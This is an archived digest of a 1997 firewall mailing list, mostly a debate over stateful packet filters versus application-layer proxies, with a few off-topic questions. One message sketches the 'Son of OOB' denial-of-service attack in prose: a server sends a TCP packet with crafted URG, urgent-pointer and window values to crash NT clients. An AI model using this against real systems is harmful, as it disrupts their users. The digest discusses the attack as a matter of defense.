> >This means that NT machines behind SPFs are vulnerable to "Son of OOB"
> >type attacks, not so proxy protected machines behind a non-NT proxy.  
> 
> A proxy would have to written specifically to handle the OOB problem,
> it would not be handled automatically.  It would probably be easier

Wrong, the protections of a "hardened host" for OOB problems are included
because you aren't passing the problem to the other hosts.  One machine,
or several thousasand, I know which I find easier to keep updated and
protected.

> to modify the SPF to catch it, actually.  Imagine if you were using the
> host OS, and your proxy depended to some degree on the NetBIOS
> over TCP implementation in NT - then your proxy would get nailed
> by the OOB attack, and not the inside machine.

1. I said "non-NT" firewall, in which case I'm *not* nailed.

2. I said "Son of OOB", which is pertinent to *any* TCP connection with
NT, _not_ just NetBIOS services.  It's not a proxy issue because it's a
lower level attack, since the proxy handles all outbound connections, and
doesn't pass packets through, it is the only machine on the network that
needs to not be vulnerable to the attack.

> In general, a proxy will not protect you against attacks
> that didn't exist or weren't know at the time it was written.

In this case, since the attack is against the stack of the clients, and
not the firewall itself, or an application, my proxy protects me where
SPF doesn't protect you.

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280





From owner-firewalls-outgoing  Tue Jun 10 00:26:30 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA14374 for firewalls-outgoing; Mon, 9 Jun 1997 17:05:10 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA14273 for ; Mon, 9 Jun 1997 17:04:45 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id QAA18862 for ; Mon, 9 Jun 1997 16:07:35 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA07361; Mon, 9 Jun 97 16:05:26 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id QAA28403 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 16:04:15 -0700 (PDT)
Message-Id: <199706092304.QAA28403@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  F3493988977A4D79882564B1007E18B1; Mon,  9 Jun 97 16:04:13 EDT
To: "Paul D. Robertson" 
Cc: Ryan Russell/SYBASE ,
        firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 16:09:09 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>This means that NT machines behind SPFs are vulnerable to "Son of OOB"
>type attacks, not so proxy protected machines behind a non-NT proxy.  

A proxy would have to written specifically to handle the OOB problem,
it would not be handled automatically.  It would probably be easier
to modify the SPF to catch it, actually.  Imagine if you were using the
host OS, and your proxy depended to some degree on the NetBIOS
over TCP implementation in NT - then your proxy would get nailed
by the OOB attack, and not the inside machine.

In general, a proxy will not protect you against attacks
that didn't exist or weren't know at the time it was written.

    Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: proberts@clark.net ("Paul D. Robertson") @ smtp
Date: 06/09/97 04:40:03 PM
Subject: Re: Stateful Packet Filters vs. Proxies

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> Yes, I don't believe the SPFs will fragment, keep
> seperate window sizes, etc.. Unless the layer 2 networks
> on each size are significantly different.

This means that NT machines behind SPFs are vulnerable to "Son of OOB"
type attacks, not so proxy protected machines behind a non-NT proxy.  

> No, I don't think that there is anything an SPF 
> can block (in the data stream) that a proxy
> can't.  But, I will claim that the opposite is true, too.

Covert channels in, leaking data in ICMP packets, which would
require an proxy-aware version of say, ping, on an application layer
gateway.  Also, a whole class of DOS attacks against the stacks of the
"protected" clients are what spring to my mind immediately.  

> A SPF has all the same access to a data stream 
> that a proxy does.  One could write some SPF
> code that would block applets.  Would you
> want to?  Probably not.  It would probably be easier
> with a traditional proxy.

Yes, and eventually, you'd have a real *mess* of code if you tried to
mirror application layer functionality.  Then think about verifying the
implementation.  If it's the first TCP fragment, and the sequence number
is valid, and the window size is good, and the IP options aren't set, and
we haven't seen a 
 tag, and it's text/html, and .....  

This sort of endless nested loop complexity is what you don't want in
security code.  Especially given the fact that you must protect against
attacks at multiple layers.  By the time you add enough to an SPF to
protect against all this, you've increased the level of complexity of the
code base by an order of magnitude, and you haven't gained any security 
over an application layer gateway because of it.

Yes, it's possible to add the same level of protection, but as you state,
it's probably something you wouldn't want to do.  Application layer
gateways gain those types of protections easily, understandably, and by
virtue of design, not by thousands of extra lines of code any one of which
could leave a hole.


Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280





From owner-firewalls-outgoing  Tue Jun 10 00:42:37 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA00999 for firewalls-outgoing; Mon, 9 Jun 1997 18:21:12 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id SAA00846 for ; Mon, 9 Jun 1997 18:20:40 -0700 (PDT)
Message-Id: <199706100120.SAA00846@honor.greatcircle.com>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA121965309; Tue, 10 Jun 1997 11:15:09 +1000
From: Darren Reed 
Subject: Re: Stateful Packet Filters vs. Proxies
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Tue, 10 Jun 1997 11:15:09 +1000 (EST)
Cc: hagan@cih.com, sjg@quick.com.au, firewalls@GreatCircle.COM
In-Reply-To: <199706091631.JAA03961@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jun 9, 97 09:36:08 am
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Ryan Russell/SYBASE, sie said:
> 
> I'm not sure how one would measure reliability, but
> my personal experience has been good.
> 
> I disagree that a SPF != a proxy, at least not
> entirely.

An SPF keeps state information about connections, which may let through
arbitary packets (so long as port #'s match) or not.  It will let the
entire packet go out, just as it came in or visa versa, so long as it
matches the rules.  It doesn't handle the data, which makes it quicker
and therefore more desirable to use (for some anyway).  It doesn't talk
on your behalf which is what a proxy does.  When using a proxy, you don't
need to (try to) immitate TCP/UDP/ICMP handling because the kernel does
that for you.

> Check out:
> 
> http://futon.sfsu.edu/~rrussell/spfvprox.htm

WARNING: THAT URL CONTAINS A HIGH AMOUNT OF MARKETTING CRAP.

Now, let me pick on this:
   ...For example, a SPF will usually work at layer 4 for
   something like telnet, but will go to layer 7 for FTP, because it has
   to. (For an explanation of why FTP is a pain in the ass, check out 
   Comer or Stevens.)
Wrong.  It still goes to layer 4 for FTP.  Why ?  Because it is still
dealing with packets, not a data stream.

    1. Proxies are a special case of a SPF.

Wrong.  FWIW, proxies can be implemented at layers 5, 6 or 7.

   Is a proxy that doesn't validate or
   modify the data in any way really "operating" at layer 7, or is it,
   for all practical purposes, operating at layer 4? Sure, the OS has to
   filter the packet all the way up to the application, and the
   application has to send it all the way back down the stack to go out
   the NIC, but so what? Did it do anything except waste CPU time that it
   didn't need to? If you break out your sniffer, and compare the
   conversations between a SPF and a proxy like the one above, will you
   see any difference? No. In fact, the proxy is doing nothing more than
   many-to-one NAT.

I put this to you: if you connect a sniffer to both sides of a firewall,
one using SPFs and the other proxies, you will see vastly different types
of "packet conversations" between the firewall and the external host it is
connecting to.  The assertion about "wasted CPU time" is purely subjective
and has no real meaning.

    1. SPFs can be the more secure choice depending on the requirements.

   In this section is the little bit of math I warned about. Trust me, it
   won't be painful.

I think you forgot how to count too.

   Ok, so SPFs can have bugs to, right? Sure. So, now you
   have to "proxy" two protocols. You still don't want to do any special 
   filtering, just pass it through. So, let's assume that proxies have
   one bug each, as do SPFs. So, we have one SPF and two proxies. One bug
   with the SPF and two for the proxies.

That is crap.  If you are using the same code for the SPF then you should be
able to use the same code for the proxy.

If the proxies are different for each, it indicates to me that the SPF
solution hasn't really been developed for either protocol whereas the
proxies have been tailored properly for a better fit.

    1. Network address translation (NAT) can be considered a form of     
       security on it's own.

   Bonus argument! This isn't directly related to SPFs vs. proxies, but I
   hope I've demonstrated the relationship, and it's another one of those
   questions I see often that I've been meaning to write down.

Well, obviously you're not trying to sell the Cisco PIX anymore.

Overall, that page says lots of things but doesn't compare SPFs and proxies
very well.

> I might also disagree that SPFs do not work
> universally well as proxys.  You'd have to explain
> to me what you mean by that exactly... The only
> difficulty I've have with the SPFs I have used is
> with UDP, something that many proxys have
> difficulty as well.

Are you sure you know what you're talking about ?  I don't get the impression
that you do, given your email and WWW page.

Darren

From owner-firewalls-outgoing  Tue Jun 10 00:43:42 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA13699 for firewalls-outgoing; Mon, 9 Jun 1997 14:13:15 -0700 (PDT)
Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA13667 for ; Mon, 9 Jun 1997 14:13:02 -0700 (PDT)
Received: from newman by newman (SMI-8.6/SMI-SVR4)
	id RAA15558; Mon, 9 Jun 1997 17:11:49 -0400
Message-ID: <339C7195.FFC9CA94@unifiedtech.com>
Date: Mon, 09 Jun 1997 17:11:49 -0400
From: Mike Jones 
Organization: Unified Technologies, Inc.
X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4u)
MIME-Version: 1.0
To: Andrew & Terri Forster 
CC: firewalls@greatcircle.com
Subject: Re: TCP/IP Addressing Problems with FireWall
X-Priority: 3 (Normal)
References: <3.0.1.32.19970609224754.0069e2fc@emirates.net.ae>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Andrew & Terri Forster wrote:
> 
> We purchased "gauntlet-type" proxy server firewall to complete our
> perimeter defences project including connection to the Internet.
> 
> We are having problems of Internal clients being able to see (ping)
> the
> Firewall and for the BSDI FireWall box to ping internal machines
> across our
> internal router.  I have prepared a rough diagram below then some
> explanations.
> 
>           I N T E R N E T
>                  |
>                  |
>           _______|_______
>          |               |
>          |               |  Internet Router 194.bbb.ccc.1 s/net
> 255.255.255.0
>          |_______________|
>                  |
>                  |
>       ___________|_____________________________   194.bbb.ccc.*
> Network
>                      |
>                      |
>                      |
>             _________|___________   Outside 194.bbb.ccc.9 s/net
> 255.255.255.0
>            |                     |       Default Router  194.bbb.ccc.1
>            |       Firewall      |
>            |_____________________|  Inside 172.17.100.1 s/net
> 255.255.0.0
>                      |
>                      |
>       _______________|_________________________  172.17.*.* Network (B
> Class)
>                |                     |
>                |               ______|______
>                |              |  W95 Client |  172.17.30.13 B S/net
>                |              |_____________|  Gateway 172.17.200.2
>                |
>                |
>       _________|_____________________
>      |     172.17.200.2              |
>      |       Cisco Router            |____________________  172.20.*.*
>      |       172.16.200.2            |                       (B Class)
>      |____________|__________________|
>                   |
>                   |
>       ____________|____________________________  172.16.*.* Network (B
> Class)
>                                 |
>                                 |
>                            _____|_______
>                           | W95 Client  |  172.16.30.11 (Gateway
> 172.16.200.2)
>                           |_____________|
> 
> Note this is a test implementation of our final IP addressing Plan.
> Our
> registered IP C Class is used on the outside of the FireWall proxy
> server
> firewall 194.bbb.ccc.* and our inside of the Firewall we use a a
> 172.17.*.*
> B class network to our internal Router which also has other
> non-internet
> data feeds (eg 172.20.*.* above).  On the inside of this internal
> router we
> are planning to use the IP address 172.16.*.* B Class network.
> 
> Our problem is that clients on the 172.16.*.* network cannot ping
> (see) the
> firewall as its default router (gateway) is set as 194.bbb.ccc.1.
> Also the
> clients on the 172.17.*.* network can see the internal network only
> when
> the gateway is set as the 172.17.200.2 interface of the Router.
> Therefore
> it will not be able to see the Internet as all traffic is sent to the
> inside not the outside.  The other external connections work fine as
> they
> all refer to their Internal Router port as their default router
> (gateway).
> Obviously I need to determine how to solve this so that the external
> traffic is directed to the Internet by the firewall and inside traffic
> correctly through the Router to the 172.16.*.* subnet.
> 
> Any Assistance would be appreciated

Your firewall needs to have a static route to the 172.16 network
pointing to 172.17.200.2. That will probably solve the entire 
problem, as your ping failures from internal systems to the
firewall is probably happening when the firewall tries to send
the ping response. 

Let me make a guess: the 172.17 network is on a switch. 
If it were on a hub, it wouldn't matter which router the clients
had set up as their default gateway because both the firewall and
the router would see the packets. If it's on a switch, then 
the router won't see packets that are sent to the firewall. Setting
up the static route, however, should cause the firewall to 
forward the packets to the router; sort of a bank shot, as it were.

--
	Mike Jones
	Sr. Technology Advisor
	UNIFIED Technologies

From owner-firewalls-outgoing  Tue Jun 10 00:46:05 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA28054 for firewalls-outgoing; Mon, 9 Jun 1997 15:47:48 -0700 (PDT)
Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA28008 for ; Mon, 9 Jun 1997 15:47:32 -0700 (PDT)
Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id RAA10247; Mon, 9 Jun 1997 17:48:39 -0500
Date: Mon, 9 Jun 1997 17:48:39 -0500
From: Craig Brozefsky 
Subject: Re: Stateful Packet Filters vs. Proxies
To: Mike Jones 
cc: firewalls@GreatCircle.COM
In-Reply-To: <339C52F9.2ADBE22F@unifiedtech.com>
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 9 Jun 1997, Mike Jones wrote:
> > I gave an example earlier of smapd, and the capabilities it presents.
> 
> Let me continue to be a contrarian and claim that mail, like other
> applications, should not necessarily be handled at all at the
> firewall. A firewall is first and foremost an access control device,
> and running an application (even a simple mail forwarder, like smap)
> is not an optimal use of the firewall. I feel much the same way
> about http proxying and filtering.

Outside of a belt and garters approach, where a non-trusted application 
server provides the application service from within a DMZ behind the 
first firewall, and with another firewall between it and the internal 
network, I would much rather have the proxy executing on the firewall, 
as a non-priveledged user and performing a subset of the application 
(only MAIL FROM RCPT TO: etc..) and designed with security in mind, then 
having the stream passed thru a SPF running in kernel mode and then into 
my internal MTA, which unless it is qmail, was not designed with security 
in mind.  The application level proxy is just that, a proxy, not the full 
application, and it runs as non priveledged code.

> > How about strong authentication at the firewall?  Presenting a POP3
> > interface that uses APOP?
> 
> How about strong authentication? Firewall-1 has offered SecurID
> authentication for quite a while now. And I'd rather not have my
> firewall present a POP3 interface at all, thank you. APOP or no
> APOP, POP3 isn't exactly a model citizen as a protocol.

I hope they have other types of strong auth, they do right?  SecureID is 
known to be weak, papers have been published exposing the lameness of 
it's auth scheme, and it also does not do stream level encryption last I 
heard.  

Please don't waffle 'isn't exactly model citizen as a protocol'.  Other 
than lack of payload encryption can you name one protocol level failure 
of POP3?  It's the implementation that's the problem usually, temp file 
creation problems, user auth problems, buffer overflow in gethostbyaddr 
handling.  An application level proxy need not implement the mailbox 
reads and such, but passes the requests to an internal POP3 server, 
handles the response and passes those to the client.  With an SPF unless 
source addresses of the incoming POP connection are re-written to look 
like a connection from the firewalls internal interface, you would still 
be susceptable to libresolv bug (gethostbyaddr, gethostbyname) that have 
been found on some nixes recently.  

> You could not exploit them on an SPF, either, since it wouldn't be
> running the MTA. This (to me) falls into the category of not 
> neglecting security on internal systems just because you have
> a firewall in place.

But I could get damn near any nix out there running BIND, or qpopper or 
the uwashington imapd to give me shell unless you patched them.  Having 
such attacks stopped at the firewall means that i don't have to rely on 
patches and vendor resposnse time to make me safe.

> Actually, I think you have it backward. We find ourselves in the
> enviable position of having most of our proxy-based firewalls 
> written by good people who know what they're doing, thereby having
> a lot of good proxies (smap being a fine example) to use as examples.
> However, those proxies theoretically are prone to buffer overflow
> attacks in the same way as the service daemons they're protecting
> are. Since an SPF doesn't reassemble or interpret entire service
> requests, it's immune to (for example) a buffer overflow attack
> based on the way a particular SMTP command is interpreted.

SPF's are not inherently immune from attacks, they are rewriting and 
processing information, maintaining state, as well as having to perform 
complex rebuilding of IP packets etc...  This is not IMO a valid point.  
And since they run in priveledged mode, an attack means total 
compromising of your firewall.  There are epxloits in TCP/IP stacks, 
there will be xploits n SPFs.

The appliction proxies run in non-priveledged spaces, and thus their 
compromise means less resources are given over to the attacker.  You also 
have one application which needs to know about various attacks on a 
service, and how to defind against them, rather then an SPF which now 
must keep track of several vendors implementations of a service for new 
bugs so that it may properly protect them.  So SPFs have to be aware of 
design problems in protocols, as well as the implementation problems of 
any vendor who may be behind them since it's those machines which are 
doing the actual provisions of service.  In contrast an application proxy 
needs to be aware of design problems of the protocol, but only one set of 
implementation exploits, it's own, one code base to track, and that code 
base is developed with security in mind, and executing in an environment 
designed with security in mind, the firewalls execution context.

In an ideal world all deamon would be as well designed as qmail, and 
Microsoft would not exist.

> I'd say that a proxy that doesn't do that is hardly worth the name.

I agree 8)  I also think that alot of our disagreements are largely 
semantic, and can go either way in a real world situation.

Craig Brozefsky              craig@onshore.com
onShore Inc.                 http://www.onshore.com/~craig
Development Team             p_priority=PFUN+(p_work/4)+(2*p_cash)


From owner-firewalls-outgoing  Tue Jun 10 01:26:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA18464 for firewalls-outgoing; Tue, 10 Jun 1997 00:59:24 -0700 (PDT)
Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id AAA18257 for ; Tue, 10 Jun 1997 00:58:26 -0700 (PDT)
Received: from Mailhub by garanti1.garanti.com.tr 
          id AA18044; Tue, 10 Jun 1997 10:59:53 +0400
Received: from GarantiUser by GarantiMailServer
 id AA05846; Tue, 10 Jun 1997 10:59:10 +0400
Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03)
          id AA05150; Tue, 10 Jun 1997 10:56:52 +0400
Message-Id: <339D95AC.3A63@garanti.com.tr>
Date: Tue, 10 Jun 1997 10:58:04 -0700
From: Cihan Subasi 
Reply-To: csubasi@garanti.com.tr
Organization: Garanti Ticaret
X-Mailer: Mozilla 3.0Gold (Win16; I)
Mime-Version: 1.0
To: Firewall Mailing List 
Subject: Again out of topic...sorry
Content-Type: text/plain; charset=iso-8859-9
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I would like to install USENET NEWS server on AIX, any shareware
product that you may recommend to me???

	Thanks
-- 


***************************************************************
Cihan Subasi
Garanti Ticaret, Istanbul Turkey

email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404
Fax  = +902126570473
***************************************************************

From owner-firewalls-outgoing  Tue Jun 10 01:49:12 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA16610 for firewalls-outgoing; Mon, 9 Jun 1997 22:10:31 -0700 (PDT)
Received: from norway.it.earthlink.net (norway-c.it.earthlink.net [204.119.177.49]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA04887 for ; Mon, 9 Jun 1997 21:07:04 -0700 (PDT)
Received: from 206.85.112.171 (pool021.max1.canoga-park.ca.us.dynip.earthlink.net [206.85.112.171])
	by norway.it.earthlink.net (8.8.5/8.8.5) with SMTP id VAA22914;
	Mon, 9 Jun 1997 21:07:47 -0700 (PDT)
Message-ID: <339CE163.1B91@earthlink.net>
Date: Mon, 09 Jun 1997 21:08:53 -0800
From: Peter & Diane Dennis 
Reply-To: poohcorner@earthlink.net
X-Mailer: Mozilla 3.0 (Macintosh; I; 68K)
MIME-Version: 1.0
To: firewalls@GreatCircle.COM
Subject: Incorrect emails 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

During the past 48 hours I have received over 370 emails at
'poohcorner@earthlink.net' either from or to your email number or
ssl-talk@netscape.com>.
We have requested urgent assistance from earthlink many times, but they
have failed to explain this phenomemon.
Can you help please.  It's driving us crazy.
Peter Dennis

From owner-firewalls-outgoing  Tue Jun 10 02:31:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA05593 for firewalls-outgoing; Mon, 9 Jun 1997 13:23:54 -0700 (PDT)
Received: from burrito.insource.com (burrito.insource.com [206.97.180.105]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA05575 for ; Mon, 9 Jun 1997 13:23:44 -0700 (PDT)
Received: from Ast_J50_2.insource.com (user14.insource.com [206.97.180.124]) by burrito.insource.com (8.8.5/8.7.3) with ESMTP id PAA01558; Mon, 9 Jun 1997 15:25:49 -0500 (CDT)
Message-ID: <339C64B5.7D4DDA9C@burrito.insource.com>
Date: Mon, 09 Jun 1997 15:16:53 -0500
From: Rafe Colburn 
Organization: Insource Technology Corp.
X-Mailer: Mozilla 4.0b5 [en] (Win95; I)
MIME-Version: 1.0
To: Jonathan Tobin 
CC: firewalls@GreatCircle.COM
Subject: Re: robots.txt
X-Priority: 3 (Normal)
References: 
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Check out this URL:

	http://info.webcrawler.com/mak/projects/robots/exclusion.html

Jonathan Tobin wrote:
> 
> i am not sure if this is the appropriate place for this kind of inquiry,
> but I would like to know if anybody has info on how to set up a
> robots.txt file; as in, what are it's capabilities?
> 
> --jonathan tobin
> www.dyabolyk.com

From owner-firewalls-outgoing  Tue Jun 10 03:02:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA10885 for firewalls-outgoing; Mon, 9 Jun 1997 13:58:20 -0700 (PDT)
Received: from mail.clark.net (mail.clark.net [168.143.0.10]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA10787 for ; Mon, 9 Jun 1997 13:58:01 -0700 (PDT)
Received: from clark.net (proberts@explorer.clark.net [168.143.0.7]) by mail.clark.net (8.8.5/8.6.5) with ESMTP id QAA00489; Mon, 9 Jun 1997 16:58:10 -0400 (EDT)
Received: from localhost (proberts@localhost) by clark.net (8.8.5/8.7.1) with SMTP id QAA11397; Mon, 9 Jun 1997 16:58:34 -0400 (EDT)
X-Authentication-Warning: clark.net: proberts owned process doing -bs
Date: Mon, 9 Jun 1997 16:58:31 -0400 (EDT)
From: "Paul D. Robertson" 
To: Mike Ordun 
cc: firewalls@GreatCircle.COM
Subject: Re: Stateful Packet Filters vs. Proxies
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Mon, 9 Jun 1997, Mike Ordun wrote:

> Have been following this discussion with a lot of interest as a reseller
> of both SPF and proxy firewalls.  I happen to believe that both are
> appropriate in different circumstances and customer need.  Nevertheless, I
> am a little troubled by the claims that SPFs are inherently
> insecure.  Let me present a challenge.  Lets compare some specific
> commercial offerings -- Firewall-1 in one corner representing SPF and say
> Gauntlet, Raptor, or ANS in the other representing the proxy approach. 
> What I would like is some specific vulnerability that I cannot protect
> myself from using the SPF as opposed to the proxy approach.  Again just

Ok, you're on a protected NT Client machine, and you open a connection to
evil.web., evil.web starts to send you data.  After determining your
browser to be IE for Win32, it sends a packet with URG set, the urgent
pointer set to the same value as "Son of OOB", and advertises an invalid
TCP window size.  With Firewall-1, you've just succumbed to a denial of
service attack.  With any of the listed application layer gateways,
nothing bad happens to your machine.

Specific enough?

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
                                                                     PSB#9280


From owner-firewalls-outgoing  Tue Jun 10 03:10:44 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id CAA06392 for firewalls-outgoing; Tue, 10 Jun 1997 02:51:49 -0700 (PDT)
Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id CAA06340 for ; Tue, 10 Jun 1997 02:51:33 -0700 (PDT)
Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id CAA05190 for ; Tue, 10 Jun 1997 02:26:00 -0700 (PDT)
Message-Id: <199706100926.CAA05190@miles.greatcircle.com>
Received: by cheops.anu.edu.au
	(1.37.109.16/16.2) id AA283684245; Tue, 10 Jun 1997 19:17:26 +1000
From: Darren Reed 
Subject: Re: Stateful Packet Filters vs. Proxies
To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE)
Date: Tue, 10 Jun 1997 19:17:25 +1000 (EST)
Cc: proberts@clark.net, firewalls@GreatCircle.COM
In-Reply-To: <199706100103.SAA04291@notesgw2.sybase.com> from "Ryan Russell/SYBASE" at Jun 9, 97 06:10:39 pm
X-Mailer: ELM [version 2.4 PL23]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

In some mail from Ryan Russell/SYBASE, sie said:
[...]
> The son of OOB attack is application specific,
> effecting only the Microsoft DNS server and the 
> Microsoft Service at port 139 (which I think is the
> NetBIOS port, not sure.)  It does not effect the
> TCP driver in general.

Looking at samba, I can't see any use of OOB, so I can't see any reason
why NetBIOS would be doing anything special with OOB.  Nor can I find
any use of OOB in BIND 8 (the reference implementation of DNS for the
ISC).

I'm sure if I checked manually, I'd find other TCP services vulnerable
to this attack that don't otherwise use OOB data.  Maybe you're saying
that these two services are vulnerable due to bugs introduced for NT
by Micro$oft ?

> The OOB flag is a perfectly legitimate flag, used by
> a number of protocols, and a firewall of any type would have
> had no reason to filter it until the attack was discovered.  
> Any proxy for those services would quite happily pass
> it on inside to any host in your network.

Wrong.  Unless an application proxy is programmed to recognise and pass
on OOB data, OOB data will be treated as in-stream data and the OOB
markers discarded & ignored.  For example, OOB data has no place in
FTP/HTTP (that I'm aware of), but TELNET/RLOGIN both use it.  What's
more, if someone deliberately sends you a bogus packet that could crash
your NT systems and you have a non-NT application firewall, the proxies
provide protection as the FW's OS must process the OOB data packet (which
may even be discarded).  The SPF can't provide this unless something is
done to handle yet another special case.

> Think of it this way.. Say I discover that if I throw the
> word "fred" into the datastream of an HTTP connection
> Netscape will delete your harddrive.  You're telling me
> that there are proxies out there that automatically
> filter out the word fred?  Before I announce the attack?

No, and neither will your SPFs.  But that is not the case, in this
instance.  The "problem" is already handled by proxies and nothing
extra needs doing (which is not the case for SPFs).

Darren

From owner-firewalls-outgoing  Tue Jun 10 03:42:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA03621 for firewalls-outgoing; Mon, 9 Jun 1997 13:11:15 -0700 (PDT)
Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA03579 for ; Mon, 9 Jun 1997 13:11:00 -0700 (PDT)
Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35])
          by halon.sybase.com (8.8.4/8.8.4) with SMTP
	  id NAA25463 for ; Mon, 9 Jun 1997 13:15:14 -0700 (PDT)
Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896)
	id AA08776; Mon, 9 Jun 97 13:13:02 PDT
Received: (from unixsvr1@localhost)
          by notesgw2.sybase.com (8.8.4/8.8.4)
	  id NAA18279 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Mon, 9 Jun 1997 13:11:53 -0700 (PDT)
Message-Id: <199706092011.NAA18279@notesgw2.sybase.com>
Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id
  5A1F07E7F8681EF2882564B1006E015C; Mon,  9 Jun 97 13:11:50 EDT
To: "Paul D. Robertson" 
Cc: Ryan Russell/SYBASE ,
        firewalls 
From: Ryan Russell/SYBASE
  
Date:  9 Jun 97 13:06:00 EDT
Subject: Re: Stateful Packet Filters vs. Proxies
X-Lotus-Type: Reply All
Mime-Version: 1.0
Content-Type: Text/Plain
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Yes, I don't believe the SPFs will fragment, keep
seperate window sizes, etc.. Unless the layer 2 networks
on each size are significantly different.

No, I don't think that there is anything an SPF 
can block (in the data stream) that a proxy
can't.  But, I will claim that the opposite is true, too.

A SPF has all the same access to a data stream 
that a proxy does.  One could write some SPF
code that would block applets.  Would you
want to?  Probably not.  It would probably be easier
with a traditional proxy.

   Ryan

---------- Previous Message ----------
To: Ryan.Russell
cc: firewalls
From: proberts@clark.net ("Paul D. Robertson") @ smtp
Date: 06/09/97 02:11:38 PM
Subject: Re: Stateful Packet Filters vs. Proxies

On 9 Jun 1997, Ryan Russell/SYBASE wrote:

> I'm not sure how one would measure reliability, but
> my personal experience has been good.
> 
> I disagree that a SPF != a proxy, at least not
> entirely.

Well, the fact that the lower level protocols aren't protected behind the
perimiter is an issue.  With an applicaiton layer proxy, only the firewall
needs to correctly handle sequence numbers, TCP window sizes, TCP headers,
